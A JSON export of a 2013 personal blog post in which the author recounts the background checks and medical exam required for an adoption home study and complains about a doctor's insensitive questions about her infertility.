{"id":3904,"date":"2013-07-27T13:02:27","date_gmt":"2013-07-27T20:02:27","guid":{"rendered":"http:\/\/www.rebeccagibson.org\/?p=3904"},"modified":"2015-06-16T07:47:21","modified_gmt":"2015-06-16T14:47:21","slug":"homestudy-updates","status":"publish","type":"post","link":"http:\/\/www.rebeccagibson.org\/?p=3904","title":{"rendered":"Homestudy updates"},"content":{"rendered":"<p>\u00e2\u02c6\u0161\u00c2\u00a0 FBI fingerprinting:\u00c2\u00a0 Why do I have to do this every year?\u00c2\u00a0 I mean, I understand why they have to run a background check each year, in case I suddenly decide to take up bank-robbing as a hobby, but why don&#8217;t they just keep the fingerprints on file?\u00c2\u00a0 It&#8217;s not like my fingerprints change each year!?!<\/p>\n<p>\u00e2\u02c6\u0161\u00c2\u00a0\u00c2\u00a0 local criminal background check:\u00c2\u00a0 sigh<\/p>\n<p>\u00e2\u02c6\u0161\u00c2\u00a0\u00c2\u00a0 DMV records:\u00c2\u00a0 seriously<\/p>\n<p>\u00e2\u02c6\u0161\u00c2\u00a0\u00c2\u00a0 medical exam\u00c2\u00a0 &#8211; you would not believe what that stupid doctor said to me.\u00c2\u00a0 There&#8217;s a section on the form asking if I am medically unable to become pregnant, if I have received fertility treatment, if it was successful, if there&#8217;s any chance with further treatment I could get pregnant, etc.\u00c2\u00a0 WHO CARES!?!\u00c2\u00a0 It&#8217;s an ADOPTION form.\u00c2\u00a0 Why are they even asking this?\u00c2\u00a0 Plus, the doctor, who only sees me once a year, doesn&#8217;t think to look at my file and has to keep asking me why I can&#8217;t get pregnant.\u00c2\u00a0 I DON&#8217;T KNOW.\u00c2\u00a0 I will never know.\u00c2\u00a0 Thanks for asking.\u00c2\u00a0 Would you like to give me papercut now and then pour lemon juice on it?\u00c2\u00a0 And THEN she says, probably everything they told me at the fertility clinic was a bunch of nonsense and I just need to loose weight.\u00c2\u00a0\u00c2\u00a0 Needless to say, this doctor is FIRED.\u00c2\u00a0 At least this is the last time I&#8217;ll have to go through this&#8230;
